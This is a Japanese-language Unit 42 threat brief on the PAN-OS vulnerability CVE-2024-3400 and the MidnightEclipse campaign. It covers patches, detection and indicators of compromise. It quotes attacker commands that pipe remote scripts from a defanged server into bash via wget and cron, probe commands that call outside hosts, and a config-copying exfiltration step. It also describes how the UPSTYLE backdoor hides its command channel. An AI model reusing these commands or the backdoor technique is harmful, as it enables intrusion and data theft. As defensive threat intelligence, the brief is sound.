脆弱性

[2024-05-21 09:55 JST 更新] 脅威に関する情報: Operation MidnightEclipse、CVE-2024-3400 に関連するエクスプロイト後の活動

Clock Icon 4 min read

This post is also available in: English (英語)

概要

この脅威概要は日次でモニタリングされ、共有すべき新たなインテリジェンスを入手しだい更新されています。全更新履歴は本稿末に記載されています。この更新履歴では、行われたすべての変更の詳細な説明を提供しています。

パロアルトネットワークスと Unit 42 は、CVE-2024-3400 に関連するアクティビティを追跡しており、外部のリサーチャー、パートナー、お客さまと協力しあい、情報を透明性と迅速性をもって共有いたします。

パロアルトネットワークスの PAN-OS ソフトウェアには、深刻度が「重大 (critical)」のコマンド インジェクションの脆弱性が存在します。この脆弱性により、認証されていない攻撃者が、同ファイアウォール上で、root 権限で任意のコードを実行できるようになります。同脆弱性には CVE-2024-3400 が割り当てられ、CVSS スコアは 10.0 となっています。

この問題による影響を受けるのは、GlobalProtect ゲートウェイまたは GlobalProtect ポータル (またはその両方) を構成済みの PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに限られます。この問題は、クラウド ファイアウォール (Cloud NGFW)、Panorama アプライアンス、または Prisma Access には影響しません。

影響を受ける製品とバージョンに関する最新情報については、この問題に関するパロアルトネットワークスのセキュリティ アドバイザリーを参照してください。さらに、Unit 42 のポッドキャスト、Threat Vector のエピソード 21 では、本脆弱性に関する発見、技術的詳細、悪用について解説しています。

パロアルトネットワークスは、この脆弱性を悪用する攻撃の増加を認識しています。サードパーティにより、この脆弱性の概念実証 (PoC) が公開されています。また、リセットやアップグレードの後も存続するエクスプロイト後の永続化技術を含む概念実証の存在も把握しています。現時点では、これらの永続化技術を使って脆弱性を積極的にエクスプロイトしようとする悪意のある試みは認識されていません。

私たちは、同脆弱性の初期エクスプロイトを Operation MidnightEclipse という名前で追跡しています。

現在の攻撃スコープ のセクションに、私たちが観測したエクスプロイト試行の種類とそれらが相対的にしめる割合についての情報を記載しています。Unit 42 が対応したケースの大半は、失敗に終わった脆弱性のエクスプロイト試行と、デバイスがエクスプロイト可能であることの確認に限定される一部 PAN-OS の侵害です。

そのほかの事例には、次のようなアクティビティがあります。

  • ハード ドライブ上のファイルを Web リクエスト経由でアクセス可能な場所にコピーするという限られた数の試み
  • 対話型コマンドの実行につながった、非常に限られた数の侵害

本脅威概要では、同脆弱性に関する情報とエクスプロイト後のアクティビティについて私たちが確認している内容を説明します。ここでは脆弱性緩和のためのガイダンスを共有しますが、読者の皆さまには、特定の製品バージョン情報と修復ガイダンスについて、セキュリティ アドバイザリーもご参照いただく必要があります。詳細情報が利用可能になりしだい、本概要は更新されます。

お使いのファイアウォールの侵害が疑われる場合は、パロアルトネットワークスのサポートまでご連絡ください。

この問題は、PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 およびそれ以降のすべての PAN-OS バージョンのホットフィックス リリースで修正されています。一般に展開されているそのほかのメンテナンス リリースのホットフィックスも提供されています。お客さまの緩和策に関する追加ガイダンスはセキュリティ アドバイザリーからご利用になれます。

ナレッジベースの記事「How to Remedy CVE-2024-3400 (CVE-2024-3400 の修正方法)」はカスタマー サポート ポータルから確認できます。

パロアルトネットワークスではベスト プラクティスとして、ネットワークの異常なアクティビティの監視と、想定されていないネットワーク アクティビティの調査を推奨します。

この問題を発見し、継続的な調整とご協力を続けてくださいました Volexity に感謝申し上げます。Volexity による分析については、同社のブログをご参照ください。

パロアルトネットワークスのお客様は、以下の方法で CVE-2024-3400 ならびにエクスプロイト後のアクティビティに使われるマルウェアに対する保護と緩和を受けています。

Threat Prevention のサブスクリプションをご利用のお客さまは、Threat ID 9518795189 および 95191 (Application and Threats (アプリケーションおよび脅威) のコンテンツのバージョン 8836-8695 とそれ以降で利用可) を有効にすることにより、この脆弱性に対する攻撃をブロックできます。弊社のセキュリティ アドバイザリーは、CVE-2024-3400 用の追加 Threat Prevention ID にあたる新規 Threat Prevention コンテンツで更新されています。

これらの Threat ID を適用するさいは、お使いのデバイス上で、同問題のエクスプロイト防止のための脆弱性防御が、GlobalProtect インターフェイスに適用されていることをご確認いただく必要があります。関連する詳細については、LIVEcommunity の記事をご参照ください。

以下のマネージド スレット ハンティングのセクションには、同 CVE のエクスプロイトの兆候を検索するのに使える XQL クエリーを含めてあります。

本稿で扱う脆弱性 CVE-2024-3400

脆弱性の詳細

パロアルトネットワークスの PAN-OS ソフトウェアには、コマンド インジェクションの脆弱性が存在します。この脆弱性により、認証されていない攻撃者が、同ファイアウォール上で、root 権限で任意のコードを実行できるようになります。この問題による影響を受けるのは、GlobalProtect ゲートウェイまたは GlobalProtect ポータル (またはその両方) を構成済みの PAN-OS 10.2、PAN-OS 11.0、および PAN-OS 11.1 ファイアウォールに限られます。 

パロアルトネットワークスはこの脆弱性を悪用する標的型攻撃を認識しています。以下のセクションで、私たちが観測したエクスプロイト後のアクティビティの詳細を説明します。

現在の攻撃スコープ

Palo Alto Networks は、エクスプロイト試行の観測結果をレベル 0 からレベル 3 までのいくつかのレベルに分類してきました。いずれの場合も、セキュリティ アドバイザリーのガイドラインに従うことをお勧めします。

レベル 0: プローブ 失敗したエクスプロイト試行。フォレンジック アーティファクトは、顧客ネットワークへのアクセスが試行されましたが、攻撃者が実際には成功しなかったことを示しています。パロアルトネットワークスは、レベル 0 の試行の即時的な影響はほぼないと評価します。

レベル1: テスト – 脆弱性がデバイス上でテストされていました。0 バイトのファイルが作成され、ファイアウォール上に存在します。ただし、不正なコマンド実行されたという指標は見られません。

レベル 2: 潜在的な漏出 デバイス上のファイルが、Web リクエストを介してアクセス可能な場所にコピーされましたが、その後ファイルがダウンロードされたかどうかは不明です。通常、コピーされたことが観察されるファイルは running_config.xml です。

レベル 3: 対話型アクセス 対話型コマンドを実行した指標がみられます。これには、シェルベースのバックドア、コードの導入、ファイルのダウンロード、コマンドの実行などが含まれる場合があります。

Unit 42 が対応したケースの大半は、失敗に終わった脆弱性のエクスプロイト試行と、一部のレベル 1 の PAN-OS の侵害であったことに留意していただくことが重要です。そのほかの事例では、標的のファイアウォールの限定的なレベル 2 の侵害や非常に限定的なレベル 3 の侵害が発生していました。

UPSTYLE と cron ジョブ バックドアのアクティビティ

Operation MidnightEclipse で観測されたアクティビティのなかで、脅威アクターは CVE-2024-3400 を悪用し、ファイアウォール上でコマンドを実行していました。私たちは、この脅威アクターが当初、Python ベースのバックドアをインストールするつもりだったと判定しました。Volexity のリサーチャーはこのバックドアを UPSTYLE の名前で参照しています。

脅威アクターは、このキャンペーン専用に UPSTYLE を作成したと考えられます。ただし、脅威アクターは 3 つの異なるエクスプロイト試行の後も UPSTYLE のインストールに失敗していました。3 回目の試行に失敗した後、この脅威アクターは、cron ジョブ バックドアをインストールしてエクスプロイト後のアクティビティを実行することにしました。

UPSTYLE のインストールに失敗後、この脅威アクターは CVE-2024-3400 をエクスプロイトし、ファイアウォール上でいくつかのコマンドを実行したことが確認されています。これらのコマンドのなかには、構成ファイルを Web アプリケーション フォルダーにコピーし、それらのファイルを HTTP リクエスト経由で漏出することが含まれています。

次の IP アドレスが、このフォルダーにコピーされた特定の構成ファイルにアクセスしようとしていたことが確認されました。これは、脅威アクターが使っている VPN だと考えられます。

  • 66.235.168[.]222

構成ファイルを収集後、この脅威アクターは脆弱性を悪用して次のコマンドを実行し、外部サーバーから bash スクリプト形式で追加のコマンドを受信していました。

  • wget -qO- hxxp://172.233.228[.]93/patch|bash

私たちはこの URL にホストされていた bash スクリプトにはアクセスできませんでした。しかし、その後すぐに、cron ジョブが作成された証拠が見つかりました。この cron ジョブは 1 分ごとに実行されて同じ外部サーバー上にホストしたコマンドにアクセスし、それらのコマンドを bash 経由で実行するというものでした (以下のコマンドを参照)。

  • wget -qO- hxxp://172.233.228[.]93/policy | bash

この URL 経由で実行されたコマンドにはアクセスできませんでしたが、この cron ジョブ ベースのバックドアは、攻撃者のエクスプロイト後のアクティビティの実行に使われたと考えられます。

インストールはできなかったものの、脅威アクターは UPSTYLE をこのキャンペーン専用に作成し、初期バックドアとして使うことを計画していたようです。また、攻撃者が UPSTYLE をインストールできなかった理由には、エクスプロイトの試行自体に含まれるミスや、実行されたコマンドの些細なミスが含まれていました。私たちは UPSTYLE がほかのエクスプロイト試行で使われていたことは確認していませんが、UPSTYLE がほかのデバイスへのインストールに成功していた可能性はあります。

前述のように、脅威アクターは UPSTYLE のインストール用コマンドを実行するためのエクスプロイト試行に 3 回失敗していました。これらの試行のうち、2 回は UPSTYLE が hxxp://144.172.79[.]92/update.py にホストされていました。

3 回目のエクスプロイト試行では、攻撃者は nhdata.s3-us-west-2.amazonaws[.]com にバックドアをホストしていました。これは、攻撃者が最初の 2 回のインストール試行の失敗は、ネットワークベースの保護によるものだと考えていたことを示唆している可能性があります。HTTP の Last-Modified ヘッダーによると、脅威アクターが 144.172.79[.]92 にホストした UPSTYLE を最後に変更したのは 2024 年 4 月 7 日のようです。

update.py ファイルは 144.172.79[.]92 にホストされています。またその SHA256 値は、3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac です。このファイルは多段構成のバックドアです。

最初に update.py は次の場所に別の Python スクリプトを書き込みます。

  • [省略]/site-packages/system.pth

この Python スクリプトは system.pth として書き込まれ、埋め込まれた Python スクリプトを Base64 としてデコードして実行します。この埋め込まれた Python スクリプトには、protectcheck という 2 つの関数があり、この順序で呼び出されます。

この protect 関数は SIGTERM シグナルを送信し、system.pth ファイルの内容を自分自身に書き戻します。これはおそらく永続化メカニズムとして行われているものと考えられます。check 関数は、/proc/self/cmdline を読み込んで、自身が monitor mp として実行されているかどうかを確認した後、Base64 で埋め込まれたべつの Python スクリプトを実行します。この Python スクリプトがバックドアとして機能するものです。

この Pythonスクリプトは system.pth によって実行されます。これには、__main という関数があり、スレッド内で実行されます。この関数は、まず次のファイルの内容とそのアクセス時刻および変更時刻を読み取ります。

  • [省略]/css/bootstrap.min.css

次に、2 秒ごとに 1 回繰り返される無限ループに入り、次のファイルを読み取ります。

  • [省略]/sslvpn_ngx_error.log

次にこのスクリプトは対象ファイルの各行をイテレートして、次の正規表現を使って脅威アクターのコマンドの行を探します。

  • img\[([a-zA-Z0-9+/=]+)\]

上記の正規表現が一致した場合、このスクリプトはコマンドの内容を Base64 でエンコードし、それを Python の OS モジュール内の popen メソッドで実行します。sslvpn_ngx_error.log ファイルの正規表現に一致しない行は同ファイルに書き戻されます。これによって実質上、コマンドを含む行が sslvpn_ngx_error.log ファイルに残らないようコマンド行を削除し、後の分析に使えないようにしています。

このコマンドを実行すると、同スクリプトはコマンドの結果を次のファイルに書き込みます。

  • [省略]/css/bootstrap.min.css

このスクリプトは別スレッドを作成して restore と呼ばれる関数を実行します。この restore 関数は、bootstrap.min.css ファイルの元の内容と元のアクセス時刻・変更時刻を受け取り、15 秒間スリープして、元の内容をファイルに書き戻します。その後、アクセス時刻・変更時刻を元の値に戻します。

この関数のポイントは、コマンドの結果を分析用に残さないことです。また、バックドアがファイルを上書きする前に結果を取得する時間はわずか 15 秒しかないことから、この脅威アクターはバックドアのクライアント側に自動化を組み込んでいたことが示唆されます。

正規のログ ファイルを使用してコマンドを受信し、正規の CSS ファイルを使用してコマンドの結果を漏出することから、この脅威アクターは、侵害したファイアウォール上での実行用にこのバックドアを特別に開発したと考えられます。

ガイダンス

弊社のお客さまには、デバイスの保護のため、回避策や緩和策が適用されている場合であっても PAN-OS を修正バージョンにただちに更新することを強くお勧めします。

この問題は、PAN-OS 10.2.9-h1、PAN-OS 11.0.4-h1、PAN-OS 11.1.2-h3 およびそれ以降のすべての PAN-OS バージョンのホットフィックス リリースで修正されています。 

今後のホットフィックスの情報と同脆弱性の緩和のための最新中間ガイダンスについて詳しくは、頻繁に更新されているCVE-2024-3400 に関するパロアルトネットワークスのセキュリティ アドバイザリーを参照してください。ナレッジベースの記事「How to Remedy CVE-2024-3400 (CVE-2024-3400 の修正方法)」はカスタマー サポート ポータルから確認できます。

同アドバイザリーの以前のバージョンでは、デバイス テレメトリーの無効化が二次的な緩和策として記載されていましたが、デバイス テレメトリーの無効化はもはや効果的な緩和策ではなくなっています。PAN-OS ファイアウォールをこの脆弱性に関連する攻撃にさらすために、デバイス テレメトリーを有効にする必要ではありませんでした。

Unit 42 マネージド スレット ハンティング チームによるクエリー

Unit 42 マネージド スレット ハンティング チームは、顧客ベース全体に対し、Cortex XDR と XQL クエリー (下記) を使って、本 CVE のエクスプロイト試行を継続的にトラッキングしています。Cortex XDR をご利用のお客さまも以下の XQL クエリーでエクスプロイトの兆候を検索できます。

そのほかに観測されたエクスプロイト

監視を継続するなかで私たちは、Threat ID 95187 の Threat Prevention シグネチャにもとづいて、CVE-2024-3400 を悪用しようとする追加の IP アドレスを確認しました。

これらの指標と Operation MidnightEclipse に関連する指標との間には、何の関係も確認されていません。後者の指標は、ゼロデイ脆弱性と UPSTYLE バックドアの悪用を伴うアクティビティのみをグループ化したものです。

本更新執筆時点では、次の IP アドレスが Threat Prevention シグネチャをトリガーしていました。

  • 110.47.250[.]103
  • 126.227.76[.]24
  • 38.207.148[.]123
  • 147.45.70[.]100
  • 199.119.206[.]28
  • 38.181.70[.]3
  • 149.28.194[.]95
  • 78.141.232[.]174
  • 38.180.128[.]159
  • 64.176.226[.]203
  • 38.180.106[.]167
  • 173.255.223[.]159
  • 38.60.218[.]153
  • 185.108.105[.]110
  • 146.70.192[.]174
  • 149.88.27[.]212
  • 154.223.16[.]34
  • 38.180.41[.]251 
  • 203.160.86[.]91
  • 45.121.51[.]2

私たちの分析によると、ファイアウォールが脆弱か、または侵害を受けたかを判断する脆弱性のプローブ (調査) 以外では、これらの IP アドレスからの追加アクティビティは確認されていません。Threat Prevention シグネチャがブロックしたエクスプロイト試行内では、次のようなコマンドが確認されています。

  • touch [省略]/global-protect/index.css
  • touch [省略]/global-protect/portal/css/test.min.css
  • cp [省略]/running-config.xml [snip]/global-protect/[16 個のランダムな文字].css

上記のコマンドは、Web アプリケーション フォルダーに空のファイルを作成している touch コマンドの使用例を 2 つ示したものです。この後、クライアントは HTTP リクエスト経由でそのファイルにアクセスして、エクスプロイトが成功したかどうかを判断します。3 番目のコマンドは、アクセス用に実行中の構成を Web アプリケーション フォルダーにコピーするという、もう少し悪性度の高い動作を示しています。

また私たちは、wgetcurl を使ってリモート サーバーにアクセスするプローブの試みも確認しています。これらの試みでは、外部の第三者がこのサーバーに対するアウトバウンドの HTTP リクエストを使い、エクスプロイトやコマンド実行の成功可否を判断していました。

  • wget srgsd1f.842b727ba4.ipv6.1433.eu[.]org
  • wget edcjn.57fe6f5d9d.ipv6.1433.eu[.]org
  • curl srgsdf.842b727ba4.ipv6.1433.eu[.]org
  • wget --no-check-certificate https://45.121.51[.]2/abc.txt

結論

こちらのセキュリティ アドバイザリーで、パロアルトネットワークス製品への影響と推奨される緩和策に関する最新情報が引き続き提供されます。私たちは、本概要を、エクスプロイトに関する情報とともに継続的に更新していきます。

改めて、パロアルトネットワークスは、この問題を発見し、継続的な調整とご協力を続けてくださいました Volexity に感謝申し上げます。Volexity による分析については、同社のブログをご参照ください。

パロアルトネットワークスは、これらの調査結果を Cyber Threat Alliance (CTA: サイバー脅威アライアンス) のメンバーと共有しました。CTA のメンバーはこのインテリジェンスを使って、お客さまに保護を迅速に提供し、悪意のあるサイバー攻撃者を体系的に阻害できます。詳細は Cyber Threat Alliance にてご確認ください。

観測済みのエクスプロイト活動に対する保護と緩和策を以下に記載します。これらはさらなる情報を入手しだい更新されます。

パロアルトネットワークス製品による CVE-2024-3400 への保護

パロアルトネットワークスのお客さまには、弊社製品/サービスの保護・更新を通じて同脅威の特定・防御が提供されています。

侵害の懸念があり弊社にインシデントレスポンスに関するご相談をなさりたい場合は、パロアルトネットワークス サポート窓口までお問い合わせください。

Advanced Threat Prevention を有効にした次世代ファイアウォールと Prisma Access

Advanced Threat Prevention セキュリティ サブスクリプションを有効にした次世代ファイアウォール (NGFW-series) では、Threat Prevention シグネチャ 9518795189 および 95191 が CVE-2024-3400 のエクスプロイト防止を支援します。

Cortex XDR、XSIAM、Unified Cloud Agent 

Cortex XDR および Corrtex XSIAM のエージェントとアナリティクスは、攻撃者が列挙ないしべつの資産へのラテラルムーブを試みた場合に、エクスプロイト後のアクティビティからの保護および検出に役立ちます。

Cortex Xpanse および XSIAM ASM モジュール

Cortex Xpanse には、インターネット上に直接露出している パロアルトネットワークスの GlobalProtect デバイスを特定し、発見結果をセキュリティ担当者にエスカレーションする機能があります。同製品をご利用のお客様は、「Palo Alto Networks GlobalProtect」という Attack Surface Rule (攻撃対象領域ルール) が有効になっていることをご確認ください。これにより、本リスクに関するアラートを有効化できます。特定結果は、Threat Response Center または Expander のインシデント ビューで確認できます。またこの発見結果は、攻撃対象領域管理 (ASM) モジュールをご購入いただいている Cortex XSIAM のお客様もご利用になれます。

IoC (侵害指標)

UPSTYLE バックドア

  • 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac
  • 5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

コマンド & コントロール インフラ

  • 172.233.228[.]93
  • hxxp://172.233.228[.]93/policy
  • hxxp://172.233.228[.]93/patch
  • 66.235.168[.]222

Python バックドアがホストされていた場所

  • 144.172.79[.]92
  • nhdata.s3-us-west-2.amazonaws[.]com

観測されたコマンド

  • wget -qO- hxxp://172.233.228[.]93/patch|bash
  • wget -qO- hxxp://172.233.228[.]93/policy | bash
  • "failed to unmarshal session(.\+.\/" mp-log gpsvc.log* (このコマンドの詳細については、セキュリティ アドバイザリーをご覧ください。)

追加リソース

更新履歴

  • 2024-04-12 10:15 PDT 初版の英語版に更新、Cortex XDR および XSIAM 製品による保護と追加リソースを追記する。
  • 2024-04-12 12:45 PDT 英語版に更新、Cortex Xpanse 製品による保護を追記する。
  • 2024-04-14 11:05 PDT 英語版に更新、GlobalProtect ポータルの構成の影響を明確化する。
  • 2024-04-14 07:55 PDT 英語版に更新、ホットフィックスが利用可能であること、セキュリティ アドバイザリーに今後のホットフィックスについての ETA が追記されたことを本稿に反映。
  • 2024-04-15 08:35 PDT 英語版に更新、「概要」のエクスプロイト アクティビティについて更新。
  • 2024-04-16 09:30 JST 英語版更新日 2024-04-15 09:16 PDT 時点の内容にもとづいて日本語の初版を作成。
  • 2024-04-17 10:30 JST 英語版更新日 2024-04-16 07:45 PDT の内容を反映し、IoC とコマンドを含む「そのほかに観測されたエクスプロイト」のセクションを追加。
  • 2024-04-17 10:30 JST 英語版更新日 2024-04-16 09:48 PDT の内容を反映し、IoC から update.py のファイル名を削除。
  • 2024-04-17 10:30 JST 英語版更新日 2024-04-16 14:00 PDT の内容を反映し、「概要」と「中間ガイダンス」のセクションに新たな緩和のガイダンスを追加し、新しい Threat Prevention シグネチャと PAN-OS の修正の提供状況を更新。
  • 2024-04-17 10:30 JST 英語版更新日 2024-04-16 14:40 PDT の内容を反映し、「概要」と「脆弱性の詳細」のセクションをよりセキュリティ アドバイザリーの内容に沿う内容に更新。
  • 2024-04-18 09:15 JST 英語版更新日 2024-04-17 06:15 PDT の内容を反映し、Threat ID 95191 を追記。
  • 2024-04-18 09:15 JST 英語版更新日 2024-04-17 11:30 PDT の内容を反映し、「そのほかに観測されたエクスプロイト」のセクションに箇条書きした項目を追加。
  • 2023-04-18 09:15 JST 英語版更新日 2024-04-17 12:23 PDT の内容を反映し、連絡先の項目を更新。
  • 2023-04-22 10:13 JST 英語版更新日 2024-04-19 12:45 PDT の内容を反映し、「現在の攻撃スコープ」のセクションと Operation MidnightEclipse のアクティビティ (「UPSTYLE および cron ジョブ バックドアのアクティビティ」) を大幅に改訂。
  • 2023-04-23 10:25 JST 英語版更新日 2024-04-22 15:15 PDT の内容を反映し、「現在の攻撃スコープ」のセクションの観測されているアクティビティのレベルをより詳細に定義。
  • 2023-04-24 09:30 JST 英語版更新日 2024-04-23 07:40 PDT の内容を反映し、「現在の攻撃スコープ」のセクションのレベル 2 およびレベル 3 の推奨事項に文言を追加。「ガイダンス」のセクションの文言を明確化。「更新履歴」のセクションを追加。
  • 2024-04-25 08:39 JST 英語版更新日 2024-04-23 07:10 PDT の内容を反映し、カスタマー サポート ポータルのナレッジベース記事へのリンクを追加。
  • 2024-04-25 10:45 JST 英語版更新日 2024-04-24 18:15 PDT の内容を反映し、既知の IoC のヒットを NGFW トラフィック内、XDR テレメトリー内、NGFW テレメトリー内から探す XQL クエリーを追記
  • 2024-04-26 08:47 JST 英語版更新日 2024-04-25 08:00 PDT の内容を反映し、ナレッジベース記事を「追加リソース」セクションに追加。
  • 2023-04-30 09:45 JST 英語版更新日 2024-04-26 12:22 PDT の内容を反映し、明確性と一貫性を改善。
  • 2024-04-30 09:45 JST 英語版更新日 2024-04-29 06:52 PDT の内容を反映し、同脆弱性に関する Unit 42 Threat Vector ポッドキャストを「追加リソース」セクションに追加。
  • 2024-04-30 09:45 JST 英語版更新日 2024-04-29 11:55 PDT の内容を反映し、サードパーティによるエクスプロイト後の永続化技術の概念実証 (PoC) について、エクスプロイトの状況を更新。
  • 2023-05-02 09:50 JST 英語版更新日 2024-05-01 08:05 PDT の内容を反映し、明確性と一貫性を改善。
  • 2023-05-13 08:59 JST 英語版更新日 2024-05-03 07:25 PDT の内容を反映し、セキュリティ アドバイザリーにお客さまに向けた追加の緩和情報が追加されたことを記載。
  • 2024-05-21 09:55 JST 英語版更新日 2024-05-20 08:10 PDT の内容を反映し、2 つめの脅威ハント用クエリーを更新
Enlarged Image